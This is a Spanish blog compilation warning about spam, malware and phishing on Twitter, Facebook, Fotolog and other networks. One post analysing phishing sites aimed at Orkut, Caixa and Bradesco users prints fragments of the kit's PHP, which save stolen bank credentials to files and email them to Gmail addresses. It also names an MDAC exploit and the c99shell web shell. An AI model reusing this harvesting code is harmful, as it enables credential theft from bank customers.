Reportar el spam es sencillo, basta con acudir a la cuenta del usuario en cuestión si tenemos verdaderos motivos para considerar que hace spam de manera reiterada, hacer click en las opciones justo al lado de su nombre y encima del timeline, para reportarlo, como aparece en la imagen y como explican en la página de soporte. Habitualmente, las cuentas de spammers no tienen un perfil muy informativo o bien usan fotografías sugerentes, tratan de seguir a muchísimos, cientos, a veces miles de usuarios para ver si al menos un porcentaje de ellos les devuelven amistosamente el seguimiento sin percatarse de su actividad, como probó la investigación del caso Osen Komura, mandan repetidos tweets sin aparente coherencia en los textos y ponen links a páginas que en ocasiones puede ser siempre la misma, aunque hay gradación desde la promoción egocéntrica, la búsqueda de lucro por comisiones y la difusión de malware. En muchos casos la cuenta es abandonada sin actividad al cabo de un tiempo, ya que sólo fue abierta para tal efecto. Las imágenes a continuación son sólo algunos ejemplos de cuentas de spam, cuya actividad era la emisión de publicidad, como contenido general, lo cual es bien distinto de los usuarios que puedan recomendar o incluir algún tweet con intención comercial.

Menos sencillo es actuar con los usuarios con conductas abusivas, cuyas cuentas no son meros spammers automatizados, sino individuos con algo de consciencia que acosan a otros usuarios, insultan y en ocasiones realizan comentarios inadmisibles por contener xenofobia y odio racial. Sobre los usuarios abusivos, el consejo de Twitter se desglosa en (1) una actitud cortés evitando el enfrentamiento directo con el acosador o la persona ofensiva, no respondiendo violentamente para censurar su actitud, ya que reforzaría un mal comportamiento, (2) protección de la información privada, no difundir datos sensibles de privacidad como la dirección física, el lugar de trabajo, teléfono, datos económicos, etc. (3) Bloquear e ignorar a un usuario acosador antes que entrar en una disputa verbal, prefiriendo la interrupción y el aislamiento antes que la reproducción de una mala conducta, (4) Proteger los tweets propios para compartir la información sólo con usuarios de confianza.

Las imágenes que están a continuación son, según mi criterio, dos ejemplos claros en objetividad de conductas abusivas inadmisibles en Twitter, la primera muestra un usuario con dos tweets en la parte superior del timeline donde incita al odio racial y a la xenofobia al acompañar una imagen tomada con teléfono móvil en el tren de cercanías de Barcelona, España, sin permiso de los viajeros fotografiados, con expresiones donde se refiere a ellos como: “monos”. La segunda imagen es de un usuario que de manera reiterada manda insultos a diferentes cuentas de Twitter, aparentemente sin que exista una disputa, sin que otros usuarios le contesten.

Además de consejos y recursos para reducir el acoso cibernético, en caso de tener que reportar una cuenta de usuario que tenga un comportamiento objetivamente ofensivo e inadmisible, se puede acceder a la sección del soporte Twitter forms para cumplir con el procedimiento de contacto con el equipo técnico. A partir de ahí serán los técnicos de seguridad quienes revisen y decidan qué hacer, eliminando contenidos concretos y/o sancionando la cuenta, aunque la comprobación no es inmediata, sí habrá un estudio del caso.

Más información en el centro de ayuda de Twitter.

Club Penguin es otra forma de entretenerse en internet de forma segura, para que los niños comiencen a manejar un ordenador y vayan controlando la tecnologia a su alcance, con seguridad y tranquilidad para sus padres y tutores. La red no tiene publicidad de terceros y es gratis acceder aunque para algunas actividades hace falta pagar una membresia. Club Penguin es amigable y tiene unos gráficos muy coloridos pensados para los más pequeños internautas.

Club Penguin tiene unas normas de control en la comunidad, para seguridad de los jóvenes pingüinos:

1. Respeta a los demás pingüinos. En Club Penguin no se toleran las malas palabras, el acoso ni el mal comportamiento hacia otros pingüinos. Si alguna de estas situaciones se produce durante el juego, se adoptarán las medidas disciplinarias correspondientes.
2. Nunca reveles tus datos personales. La mejor forma de mantener la seguridad online es NUNCA dar a conocer tu verdadero nombre, número de teléfono, domicilio, correo electrónico o contraseña.
3. No utilices lenguaje inadecuado. En Club Penguin no se permite hacer referencia a drogas, alcohol ni a actividades con contenido sexual, discriminatorio o que de algún modo resulten inapropiadas.
4. No hagas trampa. Aquí no se permite el uso de programas de terceros para hacer trampa. Aquellos jugadores que usen programas de terceros mientras están jugando correrán el riesgo de quedar suspendidos para siempre.

Además cuentan con moderadores online para que los menores que están detrás de las pantallas no tengan problemas, para ser elegido moderador hay que cumplir una serie de requisitos, como no tener antecedentes penales, vivir cerca de las oficinas y ser mayor de edad, entre lo más básico.

Visto gracias a Milagros en ChicaSEO

Y es por ello que no debe ser raro que Twitter, una de las redes sociales más frecuentadas por los usuario de la web, sea objeto de numerosos intentos de ataque y sobre él se desplieguen variadas estrategias para robar datos o infectar el ordenador de los usuarios del popular servicio de microblogging.

No obstante si bien las formas de llegar a los usuarios son diversas, uno de los recursos recurrentes es el spam, algo que desgraciadamente es cada vez más común en Twitter; y una molestia en todos los sentidos, que pese a los intentos de eliminación sigue rondando entre la gran cantidad de tweets que se escriben al día.

Es por ello que con el fin de evitarles dolores de cabeza hoy en Spamspam les traemos algunas formas eficaces y prácticas de combatir el spam en Twitter, desde herramientas hasta tips sencillos, pero de buena utilidad:

Twitblock: Una herramienta que sin duda destaca por su simpleza de uso pero enorme utilidad, ya que con ella podemos analizar a nuestros followers uno a uno para averiguar si se trata de un spammet o no, si la respuesta es afirmativa te ofrece la opción de bloquear dicho seguidor, con lo que te podrás librar de tweets molestos y peligrosos.

Reportarselo a @spam: Uno de los intentos del staff de Twitter por eliminar la basura electrónica de su servicio. Por este medio podemos reportar cualquier cuenta spammer con sólo mandar un simple reply seguido de la cuenta no grata: @spam @unspammer, por poner un ejemplo.

Tweetblocker: Una herramienta que se encargara de escanear a tus seguidores asignandoles unas calificación de la A a la F, la cual mide su nivel de confiabilidad, en otras palabras si son humanos o no, lo mejor es que no hay que ingresar la contraseña de tu cuenta para utilizar Tweetblocker.

Como nota final puedo decir que siempre podremos convertir nuestra cuenta a privada cuando los spammers en verdad anden insoportables, pero eso quedará de última, ya que las herramientas antes mencionadas son poderosas formas de mantener tu lista de followers limpia y borrar el rastro de los spammers de tu comunidad en Twitter.

Tal ha sido el caso de Facebook, que desde agosto del año pasado es azotado por Koobface, un gusano bastante peligroso y que parece que no esta dispuesto a irse de la red social, si bien en sus inicios se aprovechaba de los mensajes en las cuentas de los usuarios para propagarse.

Hace poco se ha dado a conocer que una nueva variante de tal malware hace uso de los enlaces distribuidos por Facebook para redireccionar a una página, la cual tiene casi una apariencia exacta de la home de dicha web social, haciendo creer a la victima que volvio a la portada, acto seguido pide actualizar tu versión del popular Flash Player para que puedas visualizar todo el contenido del portal, momento en el que tu ordenador es infectado para luego buscar, tratando de obtener datos bancarios de los desafortunados.

De igual forma Koobface busca aumentar su presencia en Twitter con el envio de URLs maliciosas al por mayor, con la característica de que ahora los mensajes como las URL que acompañan estos son generados aleatoriamente, impidiendo así­ el filtrarlos por keywords y saltar en parte la reciente protección que implemento Twitter en base a la API de Google SafeBrowsing.

De esto queda decir que la precaución nunca esta de más por lo que vale pensarlo 2 veces al seguir una dirección en Twitter y comprobar que en verdad esta en la home de Facebook, ya que al parecer Koobface va por más.

Fuente | Viruslist

Aunque muchos analistas de seguridad informática han intentado definir la fuente y origen del ataque, todaví­a no se sabe con exactitud dicha información, sin embargo Bill Woodcock, director de investigación del Centro de Intercambio de Información de Paquetes, una organización dedicada al seguimiento del tráfico en internet, señalo que por los volumenes de tráfico con los que se realizó el ataque, este pudo provenir de alguna zona cerca de Rusia y Georgia y corresponder a una extensión del conflicto existente entre estos paises.

Además descartó que la culpable de este acontecimiento fuera una botnet y señaló que se debió a una ola de mensajes spam que fue utilizada para redirigir a las victimas al sitio y así­ de esta forma saturar de peticiones los servidores de Twitter.

Facebook y LiveJournal también se vieron afectados, aunque no en la medida del servicio de los 140 caracteres, investigadores de prestigiosas firmas de seguridad como Kaspersky Lab manifestaron que es inusual un ataque de esta magnitud, tanto en la duración como en si misma, por la condición de que la mayoría de sitios con elevadas cantidades de tráfico estan blindados y prevenidos para actuar en este tipo de situaciones.

No obstante señalaron que tal vez por el sostenido ritmo de crecimiento que tiene el servicio, el tiempo no ha sido el mejor aliado para los creadores de Twitter en lo que respecta a establecer medidas de contención para esta clase de sucesos, ¿o es que Twitter peca de falta de seguridad?, ya lo dirán las investigaciones sobre el caso y el futuro de tal servicio.

Parte de la información fue vista en NYTimes

¿Qué tipo de urls son consideradas maliciosas por Twitter?

En Twitter como en cualquier otra red social, al volverse tan popular, también ha sido objeto deseado por los spammers, distribuidores de malwares y otras amenazas para los internautas. Recordemos que en Twitter las urls se acortan de modo que parece una especie de encriptación para el usuario que no sabe a donde le van a dirigir. Parece que Twitter ha tomado recomendaciones de F-Secure, una empresa experta en seguridad y ha comenzado a utilizar un filtro de enlaces que redirigen a sitios conocidos que tienen malware.

No se sabe muy bien si han tomado como referencia la base de datos de StopBadware, se comenta también que usan la API de Google para filtrar las urls de los enlaces en los Tweets.

Existe también protección antimalware si se usan aplicaciones externas de terceros que toman nuestros datos de acceso para enviar actualizaciones a Twitter, ya sea Tweetdeck, TwitterFeed, Tweetie, Seesmic, Twitterfox, etc, el mensaje simplemente no aparecerá en nuestra linea de tiempo, tal como si no hubiésemos enviado nada.

Bit.ly es por ahora el único servicio que esta comprobando también las URL enviadas por los usuarios, el acortador por defecto que se usa en el sitio de Twitter, aunque no todos los acortadores de urls proporcionan la misma seguridad.

Usando como principales impulsores la adición de ordenadores a las diferentes botnets que hacen que este tipo de correo se propague más rápido y sin ningún esfuerzo y la colaboración entre escritores de malware y spammers ha sido posible que las botnets cuenten hoy en dia con alrededor de 14 millones de computadoras sino es que más, entre sus filas.

Por su parte los volumenes de spam se han elevado a la sorprendente cantidad de 117 mil millones de correos de este tipo por dia, lo que contribuye a que un estimado de 150 mil PCs se infecten con malware y sean propensas a pertencer a una botnet de forma diaria.

Cabe destacar que el incremento viene en gran parte por la creación de software malicioso que aprovecha la característica Autorun de Windows para ejecutarse, así­ como también los ataques a las redes sociales como: Facebook, Twitter y MySpace, donde constantemente se llevan acabo intentos de phishing y se distribuye malware, como el peligroso virus Koobface, el cual tiene como propósito robar los datos de los usuarios e infectar su computador dirigiendolos a páginas contaminadas, dicho virus fue identificado en agosto del año pasado y hasta la fecha sigue merodeando Facebook, lo cual demuestra lo efectivo de estos métodos y la limitada respuesta que tienen a veces las redes sociales para erradicar estas amenazas.

Datos vistos en Allspammedup

Y es que estas son y han sido desde hace un buen tiempo un gran recurso para infectar nuestras PC de forma realmente fácil, estableciendose como plataformas de operación para spammers y punto de partida para la distribución de malware.

Esto debido a la gran cantidad de formas que se pueden utilizar para llegar hacia nuestro ordenador:

- A Facebook, debido a la gran cantidad de juegos y aplicaciones que existen para esta red social, lo convierten en un buen sitio para atacar muchos ordenadores, ya que la mayoría sino todas son realizados por terceros a partir de APIs y demás, lo cual propicia que no halla una revisión de la programación de las aplicaciones, almacenando muchos virus y códigos maliciosos en Facebook.

- Los acortadores de URLs también hacen su parte en el negocio del spam y no precisamente porque sean un mala herramienta, sino porque parte de su funcionamiento habría que mejorarlo, por la falta de información que las URL cortas te brindan al querer saber su dominio destino, haciendo que en Twitter donde mayormente son utilizadas estas heramientas se presenten a diario varias estafas e infecciones por este medio o incluso vía emails donde también su utilización es muy frecuente por los ciberdelincuentes.

- La extorsión que se presenta a algunos usuarios mediante correos para revelar datos atemorizandolos con revelar imágenes o videos comprometedores sobre ellos, la parte que más toca el lado social de la internet, pero aprovechandose de esta para lograr actos delictivos.

- Fotolog; Metroflog y en general sitios de este tipo, debido a la basta libertad que se tiene para publicar opiniones y comentarios en la cuentas por la mayoría de usuarios constituyen también un factor de riesgo para nuestro equipo.

Son estos algunos métodos los que están haciendo de las redes sociales el sistema ideal para desarrollar nuevas campañas masivas de daño e infección a los equipos informáticos, basandose en ingenieria social y la explotación de bugs en las plataformas sociales, ante esto sólo queda ser prevenido y esperar a que las diferentes redes sociales implementen más sistemas de seguridad que protejan a sus usuarios.

Mas información en: IDG

Facebook, Hi5, MySpace y recientemente Twitter forman parte de la elite de sitios sociales con mayor presencia en Internet, siendo de los portales preferidos por los usuarios.

Lamentablemente la alta popularidad de estos portales también ha ocasionado que sean el blanco de spammers y estafadores que se valen de los millones de usuarios de estas redes para dejar su basura electrónica buscando beneficios económicos.

Muy conocido es ya que -por ejemplo- Facebook es usado como una “plataforma de empuje” para supuestas redes sociales que implementan modelos de negocio piramidal, involucrando referidos con la falsa promesa de ganar dinero y encubriendo su estafa llamándola como un “negocio multinivel“.

De esta forma, estos emprendimientos de spammers y estafadores -apoyados por aquellos inocentes que intentan ganar dinero refiriendo gente- buscan “convertir” a los usuarios de Facebook en miembros de su red social, con el gancho publicitario “el Facebook que te paga“. Por supuesto, totalmente falso.

Como siempre, la recomendación para los usuarios de Facebook y otras redes sociales es evitar “hacer amistad” con estas personas que solo buscan referidos para enviarlos a otras redes sociales falsas de dudosa procedencia, y por supuesto -en la medida de lo posible- denunciar a estos Spammers con las herramientas que las redes sociales brindan para ello.

Precisamente, en estos momentos está pasando una gran oleada de Spam en el sitio Fotolog.com, en donde aquellos usuarios que tienen permitidos los comentarios en sus respectivos perfiles de cuenta pueden observar como usuarios desconocidos dejan mensajes incitando a los usuarios a visitar sitios web de dudosa procedencia.

El sitio web al que enlazan estos mensajes de Spam (que por obvias razones no mencionamos), se trata de un aparente portal de videos que incita a los usuarios a descargar un plugin para el navegador web que aparentemente permite visualizar el contenido multimedia de estos sitios. Aunque en realidad, este aparente plugin está programado con un código malicioso.

Por supuesto, este código malicioso lo único que busca es tomar control del ordenador para que este pueda ser controlado a distincia y ser usado en ataques DDoS, todo esto sin el conocimiento y mucho menos el consentimiento del usuario.

Más información en Genbeta.

Este ataque se dio de forma masiva con el registro de varios cientos de cuentas de Twitter, las que comenzaron a realizar bastante actividad en el servicio dando “follow” a cualquier usuario que encontraban en busca de que el mismo también realizara la misma acción (algo muy recurrente entre los usuarios de Twitter). De esta forma, el robot que controlaba las cuentas fraudulentas simulaba ser una chica de 23 años que incitaba a los usuarios para que visitaran el sitio web del que hicimos mención en el párrafo anterior.

La supuesta invitación de “la chica” se daba en forma de un enlace disfrazado a través del servicio de acortamiento de URL’s TinyURL.com, comprometiendo a más de 750 usuarios que hicieron click en dicho enlace, llegando al sitio web en cuestión y en donde más de la mitad de ellos descargó alguna de las variantes del software malintencionado que se alojaba en este sitio.

Los altos mandos de Twitter han informado que ya tienen control sobre la situación, aunque recomendaron a los usuarios que fueron víctimas de este ataque cambiar la contraseña de su cuenta.

Fuente: Viruslist.

Los atacantes modificaron los archivos index (php, html, etc.) agregando una porción de código Javascript que intenta explotar la vulnerabilidad en Microsoft Data Access Components (MDAC) que ejecutaba código de forma remota y descargar un virus troyano empaquetado con Themida. Agregaron además, tres carpetas con archivos que simulan ser la pagina de Orkut, red social muy usada por internautas de Brasil, Caixa Federal, Bradesco y algunas herramientas en PHP para atacar sitios web como c99shell.php. En todos estos casos los usuarios fueron redirigidos a dichas webs haciendo uso del envio de correos electrónicos con enlaces a los sitios web de cebo alojados en otros sitios web no fraudulentos pero con su seguridad comprometida tras el ataque de los crackers.

El robo de datos en la pagina de cebo que imitaba la red social Orkut se cometia invitando al usuario a visitar una comunidad de miembros VIP. Una vez ingresados los datos en la web falsa, los mismos eran enviados a una cuenta de correo de Gmail y a posteriori se redireccionaba al usuario a la comunidad antes mencionada.

// Configuracao de variaveis:
$mailto = e noisxx;
$mailtoaddr = so.alegriass@gmail.com;
$subject = /;
$redirectpage = http://www.orkut.com/Community.aspx?cmm=5554597;

Respecto al método usado para el fraude al banco Caixa Económica Federal, era similar aunque más peligroso porque no se trataba de los datos de acceso a un perfil de red social sino datos bancarios, claves para cuentas o tarjetas de crédito y débito. Para este banco el usuario es llevado hacia una copia de la web del banco en donde el único enlace funcional es el de la imagen que nos permite acceder a la banca en línea.

Los datos obtenidos son almacenados en archivos en texto plano cuyo nombre se corresponde con la fecha y hora del ingreso de la ví­ctima.

$today = date(”d-M-Y-H-i-s”);
$myFile = “../arquivos/” . $today.”.txt”;

Esta información es enviada además via email a la dirección dos casillas de correo de Gmail luego redirecciona a una página de error.

$para = o.alegriass@gmail.com, rcricardonb1@gmail.com;
$assunto = CaixaNew [ ". $ip_usuario. " ] œ;

La otra entidad bancaria afectada es Bradesco, en este caso el ataque dirige a una web de cebo que imita al sitio bancario auténtico y solicita la información de acceso a la banca al igual que los datos completos de la tarjeta necesaria para realizar operaciones en línea con este banco.

El sitio web era similar al de la entidad Bradesco salvo que unicamente funcionan los formularios creados para recolectar los datos privados de las victimas del fraude.

Una vez completados los datos son guardados y enviados por correo como en el caso anterior de Caixa Federal.
$today = date(d-M-Y-H-i-s);
$myFile = ../arquivos/ . $today..txt;

$para = so.alegriass@gmail.com;
$assunto = XDEXCO – . $ip_usuario. – . $today;
$boundary = strtotime(NOW);
$headers = From: XDESCO \r\n;
$headers .= De: XDESCO \r\n;
$headers .= To: $para <$para>\r\n;

Si conoces a algún brasileño o alguna persona que tenga cuenta en alguna de estas entidades avisale de este tipo de fraudes, seguro que te lo agradecerá.

De acuerdo con la corte del distrito de California del norte, en San José, Guerbuez violo varias leyes federales norteamericanas y fue condenado a pagar una indemnización de 873 millones de dólares a Facebook. Además, se le prohibió a Guerbuez acceder a cualquier página de Facebook en el futuro. La demanda también incluyo a otros 25 individuos que actuaron en colaboración con Adam Guerbuez. La suma es enorme, probablemente constituye una multa disuasoria para el resto de spammers del mundo, aunque evidentemente es muy raro que el spammer condenado a pagar dicha suma sea tan solvente como para poder abonar un importe millonario.

Desgraciadamente, aunque el spam sea cada vez menos rentable, seguramente que los spammers que se ocultan tras grandes redes de botnets, van a seguir con sus prácticas mientras piensen que pueden permanecer ocultos.

Sin embargo, lo que en un principio es bastante inocente y divertido se utiliza también como medio de marketing, muchos usuarios envian links para vender productos a través de Twitter, cuantos más seguidores o followers tengan, mayor es la probabilidad de hacer ventas. Al igual que muchos vendedores tratan de promocionar sus productos y sitios web por Twitter también hay peligrosos spammers que envian links a malware o spam puro y duro.

Una de las formas más utilizadas para realizar SPAM en Twitter acumulando primero followers, y una manera de acumular followers es dedicarse a hacer amigos, siguiendo previamente las actualizaciones de los demás, uno puede seguir a otros usuarios para recibir sus actualizaciones y en el momento que hacemos esto dicho usuario se entera por un aviso del sistema, con lo que es normal que muchos de estos usuarios nos devuelvan el contacto siguiéndonos para recibir nuestras actualizaciones, como si de un favor amistoso se tratase. Tú me sigues a mi, pues como me has caido majo, yo te sigo a ti.

Entonces el peligro viene de los spammers que hayan logrado ser seguidos por muchas personas a las que previamente han seguido ellos para ver si les devolvian el “follow”. Ya que cuantos más seguidores estén en su lista, antes podran contactar con más personas para enviar sus links. Para accelerar este procedimiento y ahorrar tiempo entre los spammers se venden aplicaciones a bajo costo que se encargan de recorrer las redes de contactos dentro de Twitter siguiendo y haciendo follow a cualquier usuario detectado.

Como podemos comprender, a nadie le gusta que le envien actualizaciones o twitteos que continuamente son links para vender cosas o publicidad no solicitada. Generalmente los spammers son ignorados y cuando envian mucha basura pierden a los seguidores, pero para entonces ya han conseguido enviar bastantes enlaces de ventas.

Desde Twitter quieren evitar este tipo de practicas y para ello comunican que han puesto un límite, no se podrá seguir a un gran número de perfiles a menos que nuestro número de seguidores tenga un equilibrio frente a los que seguimos. Desde el blog prometen seguir mejorando sus sistemas para erradicar a los usuarios maliciosos. En un comunicado oficial en el blog de Twitter, explican de que se trata el fenómeno del “Follow Spam”, el seguimiento masivo buscando la simpatia del usuario real. Desde Twitter avisan de que no hay formula mágica ni porcentaje que determine quien hace spam o no. Solamente puede suponerse el Follow spam cuando un usuario que no es una personalidad reconocida, tiene una gran actividad y un gran número (miles y miles) de contactos en seguimiento.

Algunas ideas sugeridas por comentaristas del blog, son limitar el número de cuentas que pueden seguirse dependiendo de tus propios seguidores, algo asi como tener al menos un 10% de seguidores dentro del mínimo para poder seguir un determinado número de cuentas de Twitter, también limitar el numero de veces que se puede usar el botón Follow por cuenta en un periodo determinado de horas, para evitar los bots automatizados y las herramientas que se venden entre spammers para rastrear a toda velocidad, sin una persona que lo haga manualmente.